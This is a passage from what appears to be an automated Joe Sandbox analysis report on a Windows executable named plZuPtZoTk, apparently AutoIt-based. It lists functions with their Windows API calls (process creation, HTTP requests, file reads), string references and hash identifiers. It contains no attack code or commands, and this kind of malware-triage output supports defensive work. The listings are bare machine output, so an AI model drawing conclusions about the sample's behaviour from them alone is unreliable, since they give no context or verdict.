                                                                      • _wcslen.LIBCMT ref: 00A58391
                                                                      • _wcslen.LIBCMT ref: 00A583B4
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A583F2
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A55BF2), ref: 00A5844E
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A58487
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A584CA
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A58501
                                                                      • FreeLibrary.KERNEL32(?), ref: 00A5850D
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A5851D
                                                                      • DestroyIcon.USER32(?,?,?,?,?,00A55BF2), ref: 00A5852C
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A58549
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A58555
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 799131459-1154884017
                                                                      • Opcode ID: bd8df81fdec29635196209b11af4e99d69b936f774e107be690d8c969af4d533
                                                                      • Instruction ID: 80fed713e2fe7086fdebcd69bf4b6a17f90ae9b48eea1630be96224f0b8f0c6c
                                                                      • Opcode Fuzzy Hash: bd8df81fdec29635196209b11af4e99d69b936f774e107be690d8c969af4d533
                                                                      • Instruction Fuzzy Hash: 6D61D171940315BEEB14DFA4CC41BBE77B8BB48B22F104509FC15EA1D1EB78A984CBA0
                                                                      Function 009C7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 0-1645009161
                                                                      • Opcode ID: 42707364994dc05b69557b8970cf1456a0eee0fc30f69bd93add96992b04d5d9
                                                                      • Instruction ID: e0ffa0bb5af31cc60073e1eeb7dc8a838bc8b2361831460aab7bd0e68ef28421
                                                                      • Opcode Fuzzy Hash: 42707364994dc05b69557b8970cf1456a0eee0fc30f69bd93add96992b04d5d9
                                                                      • Instruction Fuzzy Hash: 4981F871E40209BBDB11BFA0DD53FAF7768BF55300F044429F905AA196EB70DA15CBA2
                                                                      Function 00A25A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadIconW.USER32(00000063), ref: 00A25A2E
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A25A40
                                                                      • SetWindowTextW.USER32(?,?), ref: 00A25A57
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00A25A6C
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00A25A72
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00A25A82
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00A25A88
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A25AA9
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A25AC3
                                                                      • GetWindowRect.USER32(?,?), ref: 00A25ACC
                                                                      • _wcslen.LIBCMT ref: 00A25B33
                                                                      • SetWindowTextW.USER32(?,?), ref: 00A25B6F
                                                                      • GetDesktopWindow.USER32 ref: 00A25B75
                                                                      • GetWindowRect.USER32(00000000), ref: 00A25B7C
                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A25BD3
                                                                      • GetClientRect.USER32(?,?), ref: 00A25BE0
                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00A25C05
                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A25C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                      • String ID:
                                                                      • API String ID: 895679908-0
                                                                      • Opcode ID: fa83756a5a39b9df32c6633235ed83a5dda347cf1be22c9a55976dab7f670f47
                                                                      • Instruction ID: 87e1d2ee05d9cb7d1c738671dbdd6c1d5dce576b4592e904f9e2ec63fc73edd0
                                                                      • Opcode Fuzzy Hash: fa83756a5a39b9df32c6633235ed83a5dda347cf1be22c9a55976dab7f670f47
                                                                      • Instruction Fuzzy Hash: 06718C31900B19AFDB20DFB8DE89AAEBBF5FF48715F104528E542A25A0E774E944CB50
                                                                      Function 009E00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009E00C6
                                                                        • Part of subcall function 009E00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A9070C,00000FA0,8C8D3FFC,?,?,?,?,00A023B3,000000FF), ref: 009E011C
                                                                        • Part of subcall function 009E00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A023B3,000000FF), ref: 009E0127
                                                                        • Part of subcall function 009E00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A023B3,000000FF), ref: 009E0138
                                                                        • Part of subcall function 009E00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009E014E
                                                                        • Part of subcall function 009E00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009E015C
                                                                        • Part of subcall function 009E00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009E016A
                                                                        • Part of subcall function 009E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009E0195
                                                                        • Part of subcall function 009E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009E01A0
                                                                      • ___scrt_fastfail.LIBCMT ref: 009E00E7
                                                                        • Part of subcall function 009E00A3: __onexit.LIBCMT ref: 009E00A9
                                                                      Strings
                                                                      • WakeAllConditionVariable, xrefs: 009E0162
                                                                      • InitializeConditionVariable, xrefs: 009E0148
                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 009E0122
                                                                      • SleepConditionVariableCS, xrefs: 009E0154
                                                                      • kernel32.dll, xrefs: 009E0133
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 66158676-1714406822
                                                                      • Opcode ID: 71d5733b14e2188b41e36f7aa039e6eb4ffc3dbacdeb4980cbbcbbeae83f85ff
                                                                      • Instruction ID: e719fa3a6ba59ce057b94b490cce879099357981a7a31118e85496acac121cbd
                                                                      • Opcode Fuzzy Hash: 71d5733b14e2188b41e36f7aa039e6eb4ffc3dbacdeb4980cbbcbbeae83f85ff
                                                                      • Instruction Fuzzy Hash: 5521FC33648B507FD7129BF5AC06F2A37A8FB85F76F000526F801A7295DFB45C418A90
                                                                      Function 00A230F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 176396367-1603158881
                                                                      • Opcode ID: c88866170a1acffe078e4feac180023396bd30204c205af459650e1bc5409953
                                                                      • Instruction ID: 77877c09a0fc223bb5682bdc3803edd0e66199dd83fee120e16cb85f984821db
                                                                      • Opcode Fuzzy Hash: c88866170a1acffe078e4feac180023396bd30204c205af459650e1bc5409953
                                                                      • Instruction Fuzzy Hash: 77E1D233E00526ABCF14EFBCD451BEDBBB0BF55750F14816AE856A7240DB34AE858790
                                                                      Function 00A344C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(00000000,00000000,00A5CC08), ref: 00A34527
                                                                      • _wcslen.LIBCMT ref: 00A3453B
                                                                      • _wcslen.LIBCMT ref: 00A34599
                                                                      • _wcslen.LIBCMT ref: 00A345F4
                                                                      • _wcslen.LIBCMT ref: 00A3463F
                                                                      • _wcslen.LIBCMT ref: 00A346A7
                                                                        • Part of subcall function 009DF9F2: _wcslen.LIBCMT ref: 009DF9FD
                                                                      • GetDriveTypeW.KERNEL32(?,00A86BF0,00000061), ref: 00A34743
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2055661098-1000479233
                                                                      • Opcode ID: 2db4dd6d639bc36fa8d982d8ea4295d56fde02e6ed70823d656c903bdf013c44
                                                                      • Instruction ID: ebd115208ffa86db22a30e6b44368660d50c60515fae1c2f5a8e406ff8806893
                                                                      • Opcode Fuzzy Hash: 2db4dd6d639bc36fa8d982d8ea4295d56fde02e6ed70823d656c903bdf013c44
                                                                      • Instruction Fuzzy Hash: D9B1DF71A083029FC710EF28C891A6AB7E5BFE9764F50491DF496C7291E730ED45CBA2
                                                                      Function 00A4AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A4B198
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B1B0
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B1D4
                                                                      • _wcslen.LIBCMT ref: 00A4B200
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B214
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B236
                                                                      • _wcslen.LIBCMT ref: 00A4B332
                                                                        • Part of subcall function 00A305A7: GetStdHandle.KERNEL32(000000F6), ref: 00A305C6
                                                                      • _wcslen.LIBCMT ref: 00A4B34B
                                                                      • _wcslen.LIBCMT ref: 00A4B366
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A4B3B6
                                                                      • GetLastError.KERNEL32(00000000), ref: 00A4B407
                                                                      • CloseHandle.KERNEL32(?), ref: 00A4B439
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4B44A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4B45C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4B46E
                                                                      • CloseHandle.KERNEL32(?), ref: 00A4B4E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 2178637699-0
                                                                      • Opcode ID: 2a71da4ca9ba7d5ea7f8646c3bfe062c0c2262045636c0b7843366659aab469b
                                                                      • Instruction ID: 6c26bff94c08d091aef4a70341c4f3f02f36ad61ebfc1392c16832ab546faed9
                                                                      • Opcode Fuzzy Hash: 2a71da4ca9ba7d5ea7f8646c3bfe062c0c2262045636c0b7843366659aab469b
                                                                      • Instruction Fuzzy Hash: 75F1AB356183409FC724EF24C891B6EBBE5AFC5710F14895DF8999B2A2CB31EC41CB62
                                                                      Function 009C326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemCount.USER32(00A91990), ref: 00A02F8D
                                                                      • GetMenuItemCount.USER32(00A91990), ref: 00A0303D
                                                                      • GetCursorPos.USER32(?), ref: 00A03081
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A0308A
                                                                      • TrackPopupMenuEx.USER32(00A91990,00000000,?,00000000,00000000,00000000), ref: 00A0309D
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A030A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 36266755-4108050209
                                                                      • Opcode ID: a5ca9bf200ad1a453bd4542db6bad71530e23c232555814d1550cf487704eb71
                                                                      • Instruction ID: 84ef5f59820021af7d1b93c876717b9f53a6ba0ec29b3df31ece90cff0056b78
                                                                      • Opcode Fuzzy Hash: a5ca9bf200ad1a453bd4542db6bad71530e23c232555814d1550cf487704eb71
                                                                      • Instruction Fuzzy Hash: 9A71087164031ABFEB258F64EC49FAABF68FF04364F208216F5256A1E0C7B1A910CB51
                                                                      Function 00A56CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00A56DEB
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A56E5F
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A56E81
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A56E94
                                                                      • DestroyWindow.USER32(?), ref: 00A56EB5
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,009C0000,00000000), ref: 00A56EE4
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A56EFD
                                                                      • GetDesktopWindow.USER32 ref: 00A56F16
                                                                      • GetWindowRect.USER32(00000000), ref: 00A56F1D
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A56F35
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A56F4D
                                                                        • Part of subcall function 009D9944: GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 2429346358-3619404913
                                                                      • Opcode ID: e7483ba50f5cf9e3d897292a3ec1bb240e40bde79b5501b53093786ebd4a9fc3
                                                                      • Instruction ID: 73e0dacf9506853b05303df2f99ecc27d07c8d02dc0bca734febb91d02649b2a
                                                                      • Opcode Fuzzy Hash: e7483ba50f5cf9e3d897292a3ec1bb240e40bde79b5501b53093786ebd4a9fc3
                                                                      • Instruction Fuzzy Hash: EA716770504345AFDB21CF58DC48FAABBE9FB99315F44091EF98987261CB74A90ACB12
                                                                      Function 00A5911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00A59147
                                                                        • Part of subcall function 00A57674: ClientToScreen.USER32(?,?), ref: 00A5769A
                                                                        • Part of subcall function 00A57674: GetWindowRect.USER32(?,?), ref: 00A57710
                                                                        • Part of subcall function 00A57674: PtInRect.USER32(?,?,00A58B89), ref: 00A57720
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00A591B0
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A591BB
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A591DE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A59225
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00A5923E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00A59255
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00A59277
                                                                      • DragFinish.SHELL32(?), ref: 00A5927E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A59371
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 221274066-3440237614
                                                                      • Opcode ID: 6ac2013c845deb28c438991157a102f08588a278f211c4d3a4e5a79745b2722a
                                                                      • Instruction ID: 942c3381323ad9ae1e1426f83a75180277cc8c9eec61ee24af82f610333cb10d
                                                                      • Opcode Fuzzy Hash: 6ac2013c845deb28c438991157a102f08588a278f211c4d3a4e5a79745b2722a
                                                                      • Instruction Fuzzy Hash: 9A614771508301AFC701EFA4DC89EAFBBE9FBC9750F00092EF595961A1DB309A49CB52
                                                                      Function 00A3C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A3C4B0
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A3C4C3
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A3C4D7
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A3C4F0
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A3C533
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A3C549
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A3C554
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A3C584
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A3C5DC
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A3C5F0
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00A3C5FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                      • String ID:
                                                                      • API String ID: 3800310941-3916222277
                                                                      • Opcode ID: f52a8fb083119685ca3ba0435197a45932cfc9ef00e702c466bbdea13a81bac6
                                                                      • Instruction ID: d7940666685ecb6325c42f6cb5b5ec82dff50676df44b6eb6ea8873a9e8a3a74
                                                                      • Opcode Fuzzy Hash: f52a8fb083119685ca3ba0435197a45932cfc9ef00e702c466bbdea13a81bac6
                                                                      • Instruction Fuzzy Hash: C5514AB1540308BFDB21DFA4CD88AAB7BBCFF08765F00441AF946A6610DB34E945DB60
                                                                      Function 00A5856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00A58592
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585A2
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585AD
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585BA
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A585C8
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585D7
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A585E0
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585E7
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585F8
                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00A5FC38,?), ref: 00A58611
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A58621
